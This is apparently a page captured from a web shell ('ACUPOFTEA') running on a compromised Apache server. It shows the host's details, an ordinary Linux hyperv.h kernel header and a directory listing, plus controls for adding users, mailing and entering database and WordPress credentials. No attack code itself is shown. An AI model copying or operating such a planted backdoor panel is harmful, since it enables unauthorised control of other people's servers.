System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
linux
/
216.73.216.141
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
hyperv.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ /* * * Copyright (c) 2011, Microsoft Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program; if not, write to the Free Software Foundation, Inc., 59 Temple * Place - Suite 330, Boston, MA 02111-1307 USA. * * Authors: * Haiyang Zhang <haiyangz@microsoft.com> * Hank Janssen <hjanssen@microsoft.com> * K. Y. Srinivasan <kys@microsoft.com> * */ #ifndef _HYPERV_H #define _HYPERV_H #include <linux/types.h> /* * Framework version for util services. */ #define UTIL_FW_MINOR 0 #define UTIL_WS2K8_FW_MAJOR 1 #define UTIL_WS2K8_FW_VERSION (UTIL_WS2K8_FW_MAJOR << 16 | UTIL_FW_MINOR) #define UTIL_FW_MAJOR 3 #define UTIL_FW_VERSION (UTIL_FW_MAJOR << 16 | UTIL_FW_MINOR) /* * Implementation of host controlled snapshot of the guest. */ #define VSS_OP_REGISTER 128 /* Daemon code with full handshake support. */ #define VSS_OP_REGISTER1 129 enum hv_vss_op { VSS_OP_CREATE = 0, VSS_OP_DELETE, VSS_OP_HOT_BACKUP, VSS_OP_GET_DM_INFO, VSS_OP_BU_COMPLETE, /* * Following operations are only supported with IC version >= 5.0 */ VSS_OP_FREEZE, /* Freeze the file systems in the VM */ VSS_OP_THAW, /* Unfreeze the file systems */ VSS_OP_AUTO_RECOVER, VSS_OP_COUNT /* Number of operations, must be last */ }; /* * Header for all VSS messages. */ struct hv_vss_hdr { __u8 operation; __u8 reserved[7]; } __attribute__((packed)); /* * Flag values for the hv_vss_check_feature. Linux supports only * one value. */ #define VSS_HBU_NO_AUTO_RECOVERY 0x00000005 struct hv_vss_check_feature { __u32 flags; } __attribute__((packed)); struct hv_vss_check_dm_info { __u32 flags; } __attribute__((packed)); /* * struct hv_vss_msg encodes the fields that the Linux VSS * driver accesses. However, FREEZE messages from Hyper-V contain * additional LUN information that Linux doesn't use and are not * represented in struct hv_vss_msg. A received FREEZE message may * be as large as 6,260 bytes, so the driver must allocate at least * that much space, not sizeof(struct hv_vss_msg). Other messages * such as AUTO_RECOVER may be as large as 12,500 bytes. However, * because the Linux VSS driver responds that it doesn't support * auto-recovery, it should not receive such messages. */ struct hv_vss_msg { union { struct hv_vss_hdr vss_hdr; int error; }; union { struct hv_vss_check_feature vss_cf; struct hv_vss_check_dm_info dm_info; }; } __attribute__((packed)); /* * Implementation of a host to guest copy facility. */ #define FCOPY_VERSION_0 0 #define FCOPY_VERSION_1 1 #define FCOPY_CURRENT_VERSION FCOPY_VERSION_1 #define W_MAX_PATH 260 enum hv_fcopy_op { START_FILE_COPY = 0, WRITE_TO_FILE, COMPLETE_FCOPY, CANCEL_FCOPY, }; struct hv_fcopy_hdr { __u32 operation; __u8 service_id0[16]; /* currently unused */ __u8 service_id1[16]; /* currently unused */ } __attribute__((packed)); #define OVER_WRITE 0x1 #define CREATE_PATH 0x2 struct hv_start_fcopy { struct hv_fcopy_hdr hdr; __u16 file_name[W_MAX_PATH]; __u16 path_name[W_MAX_PATH]; __u32 copy_flags; __u64 file_size; } __attribute__((packed)); /* * The file is chunked into fragments. */ #define DATA_FRAGMENT (6 * 1024) struct hv_do_fcopy { struct hv_fcopy_hdr hdr; __u32 pad; __u64 offset; __u32 size; __u8 data[DATA_FRAGMENT]; } __attribute__((packed)); /* * An implementation of HyperV key value pair (KVP) functionality for Linux. * * * Copyright (C) 2010, Novell, Inc. * Author : K. Y. Srinivasan <ksrinivasan@novell.com> * */ /* * Maximum value size - used for both key names and value data, and includes * any applicable NULL terminators. * * Note: This limit is somewhat arbitrary, but falls easily within what is * supported for all native guests (back to Win 2000) and what is reasonable * for the IC KVP exchange functionality. Note that Windows Me/98/95 are * limited to 255 character key names. * * MSDN recommends not storing data values larger than 2048 bytes in the * registry. * * Note: This value is used in defining the KVP exchange message - this value * cannot be modified without affecting the message size and compatibility. */ /* * bytes, including any null terminators */ #define HV_KVP_EXCHANGE_MAX_VALUE_SIZE (2048) /* * Maximum key size - the registry limit for the length of an entry name * is 256 characters, including the null terminator */ #define HV_KVP_EXCHANGE_MAX_KEY_SIZE (512) /* * In Linux, we implement the KVP functionality in two components: * 1) The kernel component which is packaged as part of the hv_utils driver * is responsible for communicating with the host and responsible for * implementing the host/guest protocol. 2) A user level daemon that is * responsible for data gathering. * * Host/Guest Protocol: The host iterates over an index and expects the guest * to assign a key name to the index and also return the value corresponding to * the key. The host will have atmost one KVP transaction outstanding at any * given point in time. The host side iteration stops when the guest returns * an error. Microsoft has specified the following mapping of key names to * host specified index: * * Index Key Name * 0 FullyQualifiedDomainName * 1 IntegrationServicesVersion * 2 NetworkAddressIPv4 * 3 NetworkAddressIPv6 * 4 OSBuildNumber * 5 OSName * 6 OSMajorVersion * 7 OSMinorVersion * 8 OSVersion * 9 ProcessorArchitecture * * The Windows host expects the Key Name and Key Value to be encoded in utf16. * * Guest Kernel/KVP Daemon Protocol: As noted earlier, we implement all of the * data gathering functionality in a user mode daemon. The user level daemon * is also responsible for binding the key name to the index as well. The * kernel and user-level daemon communicate using a connector channel. * * The user mode component first registers with the * kernel component. Subsequently, the kernel component requests, data * for the specified keys. In response to this message the user mode component * fills in the value corresponding to the specified key. We overload the * sequence field in the cn_msg header to define our KVP message types. * * * The kernel component simply acts as a conduit for communication between the * Windows host and the user-level daemon. The kernel component passes up the * index received from the Host to the user-level daemon. If the index is * valid (supported), the corresponding key as well as its * value (both are strings) is returned. If the index is invalid * (not supported), a NULL key string is returned. */ /* * Registry value types. */ #define REG_SZ 1 #define REG_U32 4 #define REG_U64 8 /* * As we look at expanding the KVP functionality to include * IP injection functionality, we need to maintain binary * compatibility with older daemons. * * The KVP opcodes are defined by the host and it was unfortunate * that I chose to treat the registration operation as part of the * KVP operations defined by the host. * Here is the level of compatibility * (between the user level daemon and the kernel KVP driver) that we * will implement: * * An older daemon will always be supported on a newer driver. * A given user level daemon will require a minimal version of the * kernel driver. * If we cannot handle the version differences, we will fail gracefully * (this can happen when we have a user level daemon that is more * advanced than the KVP driver. * * We will use values used in this handshake for determining if we have * workable user level daemon and the kernel driver. We begin by taking the * registration opcode out of the KVP opcode namespace. We will however, * maintain compatibility with the existing user-level daemon code. */ /* * Daemon code not supporting IP injection (legacy daemon). */ #define KVP_OP_REGISTER 4 /* * Daemon code supporting IP injection. * The KVP opcode field is used to communicate the * registration information; so define a namespace that * will be distinct from the host defined KVP opcode. */ #define KVP_OP_REGISTER1 100 enum hv_kvp_exchg_op { KVP_OP_GET = 0, KVP_OP_SET, KVP_OP_DELETE, KVP_OP_ENUMERATE, KVP_OP_GET_IP_INFO, KVP_OP_SET_IP_INFO, KVP_OP_COUNT /* Number of operations, must be last. */ }; enum hv_kvp_exchg_pool { KVP_POOL_EXTERNAL = 0, KVP_POOL_GUEST, KVP_POOL_AUTO, KVP_POOL_AUTO_EXTERNAL, KVP_POOL_AUTO_INTERNAL, KVP_POOL_COUNT /* Number of pools, must be last. */ }; /* * Some Hyper-V status codes. */ #define HV_S_OK 0x00000000 #define HV_E_FAIL 0x80004005 #define HV_S_CONT 0x80070103 #define HV_ERROR_NOT_SUPPORTED 0x80070032 #define HV_ERROR_MACHINE_LOCKED 0x800704F7 #define HV_ERROR_DEVICE_NOT_CONNECTED 0x8007048F #define HV_INVALIDARG 0x80070057 #define HV_GUID_NOTFOUND 0x80041002 #define HV_ERROR_ALREADY_EXISTS 0x80070050 #define HV_ERROR_DISK_FULL 0x80070070 #define ADDR_FAMILY_NONE 0x00 #define ADDR_FAMILY_IPV4 0x01 #define ADDR_FAMILY_IPV6 0x02 #define MAX_ADAPTER_ID_SIZE 128 #define MAX_IP_ADDR_SIZE 1024 #define MAX_GATEWAY_SIZE 512 struct hv_kvp_ipaddr_value { __u16 adapter_id[MAX_ADAPTER_ID_SIZE]; __u8 addr_family; __u8 dhcp_enabled; __u16 ip_addr[MAX_IP_ADDR_SIZE]; __u16 sub_net[MAX_IP_ADDR_SIZE]; __u16 gate_way[MAX_GATEWAY_SIZE]; __u16 dns_addr[MAX_IP_ADDR_SIZE]; } __attribute__((packed)); struct hv_kvp_hdr { __u8 operation; __u8 pool; __u16 pad; } __attribute__((packed)); struct hv_kvp_exchg_msg_value { __u32 value_type; __u32 key_size; __u32 value_size; __u8 key[HV_KVP_EXCHANGE_MAX_KEY_SIZE]; union { __u8 value[HV_KVP_EXCHANGE_MAX_VALUE_SIZE]; __u32 value_u32; __u64 value_u64; }; } __attribute__((packed)); struct hv_kvp_msg_enumerate { __u32 index; struct hv_kvp_exchg_msg_value data; } __attribute__((packed)); struct hv_kvp_msg_get { struct hv_kvp_exchg_msg_value data; }; struct hv_kvp_msg_set { struct hv_kvp_exchg_msg_value data; }; struct hv_kvp_msg_delete { __u32 key_size; __u8 key[HV_KVP_EXCHANGE_MAX_KEY_SIZE]; }; struct hv_kvp_register { __u8 version[HV_KVP_EXCHANGE_MAX_KEY_SIZE]; }; struct hv_kvp_msg { union { struct hv_kvp_hdr kvp_hdr; int error; }; union { struct hv_kvp_msg_get kvp_get; struct hv_kvp_msg_set kvp_set; struct hv_kvp_msg_delete kvp_delete; struct hv_kvp_msg_enumerate kvp_enum_data; struct hv_kvp_ipaddr_value kvp_ip_val; struct hv_kvp_register kvp_register; } body; } __attribute__((packed)); struct hv_kvp_ip_msg { __u8 operation; __u8 pool; struct hv_kvp_ipaddr_value kvp_ip_val; } __attribute__((packed)); #endif /* _HYPERV_H */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
..
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
android
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
byteorder
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
caif
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
can
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
cifs
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
dvb
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
genwqe
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
hdlc
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
hsi
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
iio
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
isdn
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
mmc
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter_arp
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter_bridge
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter_ipv4
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter_ipv6
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
nfsd
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
raid
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
sched
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
spi
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
sunrpc
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
tc_act
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
tc_ematch
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
usb
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
wimax
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
a.out.h
text/x-c
6.73 KB
-rw-r--r--
2025-12-08 09:06:43
acct.h
text/x-c
3.65 KB
-rw-r--r--
2025-12-08 09:06:42
adb.h
text/x-c
1.11 KB
-rw-r--r--
2025-12-08 09:06:42
adfs_fs.h
text/x-c
936 B
-rw-r--r--
2025-12-08 09:06:43
affs_hardblocks.h
text/x-c
1.51 KB
-rw-r--r--
2025-12-08 09:06:40
agpgart.h
text/x-c
3.85 KB
-rw-r--r--
2025-12-08 09:06:41
aio_abi.h
text/x-c
3.34 KB
-rw-r--r--
2025-12-08 09:06:42
am437x-vpfe.h
text/x-c
3.59 KB
-rw-r--r--
2025-12-08 09:06:43
apm_bios.h
text/x-c
3.6 KB
-rw-r--r--
2025-12-08 09:06:43
arcfb.h
text/x-c
213 B
-rw-r--r--
2025-12-08 09:06:42
arm_sdei.h
text/x-c
2.69 KB
-rw-r--r--
2025-12-08 09:06:42
aspeed-lpc-ctrl.h
text/x-c
1.74 KB
-rw-r--r--
2025-12-08 09:06:41
atalk.h
text/x-c
1023 B
-rw-r--r--
2025-12-08 09:06:41
atm.h
text/x-c
7.7 KB
-rw-r--r--
2025-12-08 09:06:40
atm_eni.h
text/x-c
648 B
-rw-r--r--
2025-12-08 09:06:40
atm_he.h
text/x-c
406 B
-rw-r--r--
2025-12-08 09:06:41
atm_idt77105.h
text/x-c
955 B
-rw-r--r--
2025-12-08 09:06:43
atm_nicstar.h
text/x-c
1.25 KB
-rw-r--r--
2025-12-08 09:06:40
atm_tcp.h
text/x-c
1.58 KB
-rw-r--r--
2025-12-08 09:06:42
atm_zatm.h
text/x-c
1.5 KB
-rw-r--r--
2025-12-08 09:06:41
atmapi.h
text/x-c
952 B
-rw-r--r--
2025-12-08 09:06:42
atmarp.h
text/x-c
1.27 KB
-rw-r--r--
2025-12-08 09:06:41
atmbr2684.h
text/x-c
3.19 KB
-rw-r--r--
2025-12-08 09:06:43
atmclip.h
text/x-c
576 B
-rw-r--r--
2025-12-08 09:06:40
atmdev.h
text/x-c
7.5 KB
-rw-r--r--
2025-12-08 09:06:43
atmioc.h
text/x-c
1.61 KB
-rw-r--r--
2025-12-08 09:06:41
atmlec.h
text/x-c
2.33 KB
-rw-r--r--
2025-12-08 09:06:41
atmmpc.h
text/x-c
4.13 KB
-rw-r--r--
2025-12-08 09:06:40
atmppp.h
text/x-c
639 B
-rw-r--r--
2025-12-08 09:06:42
atmsap.h
text/x-c
4.85 KB
-rw-r--r--
2025-12-08 09:06:41
atmsvc.h
text/x-c
1.81 KB
-rw-r--r--
2025-12-08 09:06:42
audit.h
text/x-c
19.92 KB
-rw-r--r--
2025-12-08 09:06:40
auto_dev-ioctl.h
text/x-c
4.87 KB
-rw-r--r--
2025-12-08 09:06:42
auto_fs.h
text/x-c
6.28 KB
-rw-r--r--
2025-12-08 09:06:42
auto_fs4.h
text/x-c
451 B
-rw-r--r--
2025-12-08 09:06:42
auxvec.h
text/x-c
1.56 KB
-rw-r--r--
2025-12-08 09:06:41
ax25.h
text/x-c
2.76 KB
-rw-r--r--
2025-12-08 09:06:43
b1lli.h
text/x-c
1.68 KB
-rw-r--r--
2025-12-08 09:06:41
batadv_packet.h
text/x-c
20.01 KB
-rw-r--r--
2025-12-08 09:06:41
batman_adv.h
text/x-c
11.7 KB
-rw-r--r--
2025-12-08 09:06:42
baycom.h
text/x-c
883 B
-rw-r--r--
2025-12-08 09:06:42
bcache.h
text/x-c
8.17 KB
-rw-r--r--
2025-12-08 09:06:41
bcm933xx_hcs.h
text/x-c
419 B
-rw-r--r--
2025-12-08 09:06:43
bfs_fs.h
text/x-c
1.85 KB
-rw-r--r--
2025-12-08 09:06:41
binfmts.h
text/x-c
628 B
-rw-r--r--
2025-12-08 09:06:40
blkpg.h
text/x-c
904 B
-rw-r--r--
2025-12-08 09:06:43
blktrace_api.h
text/x-c
4.59 KB
-rw-r--r--
2025-12-08 09:06:40
blkzoned.h
text/x-c
6.45 KB
-rw-r--r--
2025-12-08 09:06:42
bpf.h
text/x-c
223.3 KB
-rw-r--r--
2025-12-08 09:06:42
bpf_common.h
text/x-c
1.33 KB
-rw-r--r--
2025-12-08 09:06:42
bpf_perf_event.h
text/x-c
529 B
-rw-r--r--
2025-12-08 09:06:42
bpfilter.h
text/x-c
465 B
-rw-r--r--
2025-12-08 09:06:41
bpqether.h
text/x-c
981 B
-rw-r--r--
2025-12-08 09:06:42
bsg.h
text/x-c
2.44 KB
-rw-r--r--
2025-12-08 09:06:42
bt-bmc.h
text/x-c
572 B
-rw-r--r--
2025-12-08 09:06:42
btf.h
text/x-c
4.68 KB
-rw-r--r--
2025-12-08 09:06:42
btrfs.h
text/x-c
28.24 KB
-rw-r--r--
2025-12-08 09:06:42
btrfs_tree.h
text/x-c
24.69 KB
-rw-r--r--
2025-12-08 09:06:41
can.h
text/x-c
7.7 KB
-rw-r--r--
2025-12-08 09:06:41
capability.h
text/x-c
13.2 KB
-rw-r--r--
2025-12-08 09:06:41
capi.h
text/x-c
3.05 KB
-rw-r--r--
2025-12-08 09:06:40
cciss_defs.h
text/x-c
3.2 KB
-rw-r--r--
2025-12-08 09:06:42
cciss_ioctl.h
text/x-c
2.7 KB
-rw-r--r--
2025-12-08 09:06:42
cdrom.h
text/x-c
28.18 KB
-rw-r--r--
2025-12-08 09:06:41
cec-funcs.h
text/x-c
52.64 KB
-rw-r--r--
2025-12-08 09:06:42
cec.h
text/x-c
36.81 KB
-rw-r--r--
2025-12-08 09:06:42
cfm_bridge.h
text/x-c
1.42 KB
-rw-r--r--
2025-12-08 09:06:43
cgroupstats.h
text/x-c
2.17 KB
-rw-r--r--
2025-12-08 09:06:41
chio.h
text/x-c
5.22 KB
-rw-r--r--
2025-12-08 09:06:43
close_range.h
text/x-c
377 B
-rw-r--r--
2025-12-08 09:06:42
cm4000_cs.h
text/x-c
1.76 KB
-rw-r--r--
2025-12-08 09:06:43
cn_proc.h
text/x-c
3.38 KB
-rw-r--r--
2025-12-08 09:06:42
coda.h
text/x-c
17.09 KB
-rw-r--r--
2025-12-08 09:06:42
coda_psdev.h
text/x-c
783 B
-rw-r--r--
2025-12-08 09:06:42
coff.h
text/x-c
12.18 KB
-rw-r--r--
2025-12-08 09:06:40
connector.h
text/x-c
2.2 KB
-rw-r--r--
2025-12-08 09:06:41
const.h
text/x-c
788 B
-rw-r--r--
2025-12-08 09:06:40
coresight-stm.h
text/x-c
674 B
-rw-r--r--
2025-12-08 09:06:42
cramfs_fs.h
text/x-c
3.47 KB
-rw-r--r--
2025-12-08 09:06:42
cryptouser.h
text/x-c
3.31 KB
-rw-r--r--
2025-12-08 09:06:41
cuda.h
text/x-c
905 B
-rw-r--r--
2025-12-08 09:06:42
cyclades.h
text/x-c
16.71 KB
-rw-r--r--
2025-12-08 09:06:41
cycx_cfm.h
text/x-c
2.92 KB
-rw-r--r--
2025-12-08 09:06:42
dcbnl.h
text/x-c
24.65 KB
-rw-r--r--
2025-12-08 09:06:41
dccp.h
text/x-c
6.29 KB
-rw-r--r--
2025-12-08 09:06:41
devlink.h
text/x-c
21.05 KB
-rw-r--r--
2025-12-08 09:06:41
dlm.h
text/x-c
2.49 KB
-rw-r--r--
2025-12-08 09:06:41
dlm_device.h
text/x-c
2.48 KB
-rw-r--r--
2025-12-08 09:06:42
dlm_netlink.h
text/x-c
1.13 KB
-rw-r--r--
2025-12-08 09:06:42
dlm_plock.h
text/x-c
894 B
-rw-r--r--
2025-12-08 09:06:42
dlmconstants.h
text/x-c
4.96 KB
-rw-r--r--
2025-12-08 09:06:43
dm-ioctl.h
text/x-c
11.13 KB
-rw-r--r--
2025-12-08 09:06:42
dm-log-userspace.h
text/x-c
14.83 KB
-rw-r--r--
2025-12-08 09:06:41
dma-buf.h
text/x-c
5.12 KB
-rw-r--r--
2025-12-08 09:06:41
dn.h
text/x-c
4.53 KB
-rw-r--r--
2025-12-08 09:06:41
dqblk_xfs.h
text/x-c
9.03 KB
-rw-r--r--
2025-12-08 09:06:41
edd.h
text/x-c
5.47 KB
-rw-r--r--
2025-12-08 09:06:42
efs_fs_sb.h
text/x-c
2.17 KB
-rw-r--r--
2025-12-08 09:06:42
elf-em.h
text/x-c
2.14 KB
-rw-r--r--
2025-12-08 09:06:41
elf-fdpic.h
text/x-c
1.1 KB
-rw-r--r--
2025-12-08 09:06:42
elf.h
text/x-c
13.16 KB
-rw-r--r--
2025-12-08 09:06:41
elfcore.h
text/x-c
2.92 KB
-rw-r--r--
2025-12-08 09:06:41
errno.h
text/x-c
23 B
-rw-r--r--
2025-12-08 09:06:42
errqueue.h
text/x-c
1.44 KB
-rw-r--r--
2025-12-08 09:06:42
erspan.h
text/x-c
1.03 KB
-rw-r--r--
2025-12-08 09:06:41
ethtool.h
text/x-c
81.89 KB
-rw-r--r--
2025-12-08 09:06:42
ethtool_netlink.h
text/x-c
22.29 KB
-rw-r--r--
2025-12-08 09:06:42
eventpoll.h
text/x-c
2.67 KB
-rw-r--r--
2025-12-08 09:06:41
fadvise.h
text/x-c
842 B
-rw-r--r--
2025-12-08 09:06:40
falloc.h
text/x-c
3.5 KB
-rw-r--r--
2025-12-08 09:06:42
fanotify.h
text/x-c
5.22 KB
-rw-r--r--
2025-12-08 09:06:40
fb.h
text/x-c
16.09 KB
-rw-r--r--
2025-12-08 09:06:42
fcntl.h
text/x-c
4.08 KB
-rw-r--r--
2025-12-08 09:06:43
fd.h
text/x-c
11.4 KB
-rw-r--r--
2025-12-08 09:06:41
fdreg.h
text/x-c
5.29 KB
-rw-r--r--
2025-12-08 09:06:41
fib_rules.h
text/x-c
1.99 KB
-rw-r--r--
2025-12-08 09:06:40
fiemap.h
text/x-c
2.71 KB
-rw-r--r--
2025-12-08 09:06:41
filter.h
text/x-c
2.16 KB
-rw-r--r--
2025-12-08 09:06:43
firewire-cdev.h
text/x-c
42.86 KB
-rw-r--r--
2025-12-08 09:06:41
firewire-constants.h
text/x-c
3.16 KB
-rw-r--r--
2025-12-08 09:06:41
flat.h
text/x-c
2.1 KB
-rw-r--r--
2025-12-08 09:06:41
fou.h
text/x-c
694 B
-rw-r--r--
2025-12-08 09:06:42
fpga-dfl.h
text/x-c
8.52 KB
-rw-r--r--
2025-12-08 09:06:43
fs.h
text/x-c
13.11 KB
-rw-r--r--
2025-12-08 09:06:42
fsl_hypervisor.h
text/x-c
7.13 KB
-rw-r--r--
2025-12-08 09:06:42
fsmap.h
text/x-c
4.29 KB
-rw-r--r--
2025-12-08 09:06:42
fuse.h
text/x-c
22.92 KB
-rw-r--r--
2025-12-08 09:06:41
futex.h
text/x-c
4.88 KB
-rw-r--r--
2025-12-08 09:06:43
gameport.h
text/x-c
897 B
-rw-r--r--
2025-12-08 09:06:42
gen_stats.h
text/x-c
1.49 KB
-rw-r--r--
2025-12-08 09:06:42
genetlink.h
text/x-c
2.12 KB
-rw-r--r--
2025-12-08 09:06:42
gfs2_ondisk.h
text/x-c
14.4 KB
-rw-r--r--
2025-12-08 09:06:41
gigaset_dev.h
text/x-c
1.41 KB
-rw-r--r--
2025-12-08 09:06:41
gpio.h
text/x-c
6.59 KB
-rw-r--r--
2025-12-08 09:06:42
gsmmux.h
text/x-c
1.02 KB
-rw-r--r--
2025-12-08 09:06:40
gtp.h
text/x-c
681 B
-rw-r--r--
2025-12-08 09:06:41
hash_info.h
text/x-c
921 B
-rw-r--r--
2025-12-08 09:06:42
hdlc.h
text/x-c
637 B
-rw-r--r--
2025-12-08 09:06:42
hdlcdrv.h
text/x-c
2.84 KB
-rw-r--r--
2025-12-08 09:06:41
hdreg.h
text/x-c
22.17 KB
-rw-r--r--
2025-12-08 09:06:41
hid.h
text/x-c
1.86 KB
-rw-r--r--
2025-12-08 09:06:41
hiddev.h
text/x-c
6.2 KB
-rw-r--r--
2025-12-08 09:06:42
hidraw.h
text/x-c
1.95 KB
-rw-r--r--
2025-12-08 09:06:41
hpet.h
text/x-c
743 B
-rw-r--r--
2025-12-08 09:06:41
hsr_netlink.h
text/x-c
1.06 KB
-rw-r--r--
2025-12-08 09:06:43
hw_breakpoint.h
text/x-c
742 B
-rw-r--r--
2025-12-08 09:06:42
hyperv.h
text/x-c
10.89 KB
-rw-r--r--
2025-12-08 09:06:42
hysdn_if.h
text/plain
1.35 KB
-rw-r--r--
2025-12-08 09:06:42
i2c-dev.h
text/x-c
2.55 KB
-rw-r--r--
2025-12-08 09:06:42
i2c.h
text/x-c
6.96 KB
-rw-r--r--
2025-12-08 09:06:42
i2o-dev.h
text/x-c
11.28 KB
-rw-r--r--
2025-12-08 09:06:41
i8k.h
text/x-c
1.49 KB
-rw-r--r--
2025-12-08 09:06:43
icmp.h
text/x-c
2.91 KB
-rw-r--r--
2025-12-08 09:06:41
icmpv6.h
text/x-c
3.94 KB
-rw-r--r--
2025-12-08 09:06:43
idxd.h
text/x-c
8.22 KB
-rw-r--r--
2025-12-08 09:06:40
if.h
text/x-c
10.65 KB
-rw-r--r--
2025-12-08 09:06:41
if_addr.h
text/x-c
1.84 KB
-rw-r--r--
2025-12-08 09:06:41
if_addrlabel.h
text/x-c
721 B
-rw-r--r--
2025-12-08 09:06:42
if_alg.h
text/x-c
946 B
-rw-r--r--
2025-12-08 09:06:41
if_arcnet.h
text/x-c
3.63 KB
-rw-r--r--
2025-12-08 09:06:42
if_arp.h
text/x-c
6.42 KB
-rw-r--r--
2025-12-08 09:06:41
if_bonding.h
text/x-c
5.17 KB
-rw-r--r--
2025-12-08 09:06:41
if_bridge.h
text/x-c
19.06 KB
-rw-r--r--
2025-12-08 09:06:42
if_cablemodem.h
text/x-c
986 B
-rw-r--r--
2025-12-08 09:06:42
if_eql.h
text/x-c
1.32 KB
-rw-r--r--
2025-12-08 09:06:41
if_ether.h
text/x-c
8.05 KB
-rw-r--r--
2025-12-08 09:06:41
if_fc.h
text/x-c
1.7 KB
-rw-r--r--
2025-12-08 09:06:43
if_fddi.h
text/x-c
3.66 KB
-rw-r--r--
2025-12-08 09:06:42
if_frad.h
text/x-c
2.95 KB
-rw-r--r--
2025-12-08 09:06:41
if_hippi.h
text/x-c
4.14 KB
-rw-r--r--
2025-12-08 09:06:40
if_infiniband.h
text/x-c
1.22 KB
-rw-r--r--
2025-12-08 09:06:43
if_link.h
text/x-c
30.28 KB
-rw-r--r--
2025-12-08 09:06:42
if_ltalk.h
text/x-c
210 B
-rw-r--r--
2025-12-08 09:06:41
if_macsec.h
text/x-c
5.7 KB
-rw-r--r--
2025-12-08 09:06:41
if_packet.h
text/x-c
7.73 KB
-rw-r--r--
2025-12-08 09:06:42
if_phonet.h
text/x-c
424 B
-rw-r--r--
2025-12-08 09:06:41
if_plip.h
text/x-c
660 B
-rw-r--r--
2025-12-08 09:06:41
if_ppp.h
text/x-c
29 B
-rw-r--r--
2025-12-08 09:06:41
if_pppol2tp.h
text/x-c
3.21 KB
-rw-r--r--
2025-12-08 09:06:41
if_pppox.h
text/x-c
4.76 KB
-rw-r--r--
2025-12-08 09:06:41
if_slip.h
text/x-c
872 B
-rw-r--r--
2025-12-08 09:06:42
if_team.h
text/x-c
2.54 KB
-rw-r--r--
2025-12-08 09:06:41
if_tun.h
text/x-c
4 KB
-rw-r--r--
2025-12-08 09:06:41
if_tunnel.h
text/x-c
4.41 KB
-rw-r--r--
2025-12-08 09:06:41
if_vlan.h
text/x-c
1.79 KB
-rw-r--r--
2025-12-08 09:06:41
if_x25.h
text/x-c
881 B
-rw-r--r--
2025-12-08 09:06:43
if_xdp.h
text/x-c
2.94 KB
-rw-r--r--
2025-12-08 09:06:43
ife.h
text/x-c
351 B
-rw-r--r--
2025-12-08 09:06:41
igmp.h
text/x-c
2.99 KB
-rw-r--r--
2025-12-08 09:06:41
ila.h
text/x-c
1.22 KB
-rw-r--r--
2025-12-08 09:06:41
in.h
text/x-c
9.78 KB
-rw-r--r--
2025-12-08 09:06:41
in6.h
text/x-c
7.26 KB
-rw-r--r--
2025-12-08 09:06:42
in_route.h
text/x-c
936 B
-rw-r--r--
2025-12-08 09:06:43
inet_diag.h
text/x-c
4.56 KB
-rw-r--r--
2025-12-08 09:06:40
inotify.h
text/x-c
3.21 KB
-rw-r--r--
2025-12-08 09:06:42
input-event-codes.h
text/x-c
27.94 KB
-rw-r--r--
2025-12-08 09:06:42
input.h
text/x-c
15.61 KB
-rw-r--r--
2025-12-08 09:06:42
io_uring.h
text/x-c
6.06 KB
-rw-r--r--
2025-12-08 09:06:41
ioctl.h
text/x-c
163 B
-rw-r--r--
2025-12-08 09:06:41
iommu.h
text/x-c
4.79 KB
-rw-r--r--
2025-12-08 09:06:43
ip.h
text/x-c
4.62 KB
-rw-r--r--
2025-12-08 09:06:43
ip6_tunnel.h
text/x-c
1.91 KB
-rw-r--r--
2025-12-08 09:06:41
ip_vs.h
text/x-c
13.31 KB
-rw-r--r--
2025-12-08 09:06:42
ipc.h
text/x-c
2.05 KB
-rw-r--r--
2025-12-08 09:06:42
ipmi.h
text/x-c
15.08 KB
-rw-r--r--
2025-12-08 09:06:41
ipmi_bmc.h
text/x-c
464 B
-rw-r--r--
2025-12-08 09:06:42
ipmi_msgdefs.h
text/x-c
3.35 KB
-rw-r--r--
2025-12-08 09:06:41
ipmi_ssif_bmc.h
text/x-c
441 B
-rw-r--r--
2025-12-08 09:06:40
ipsec.h
text/x-c
947 B
-rw-r--r--
2025-12-08 09:06:43
ipv6.h
text/x-c
3.87 KB
-rw-r--r--
2025-12-08 09:06:40
ipv6_route.h
text/x-c
1.86 KB
-rw-r--r--
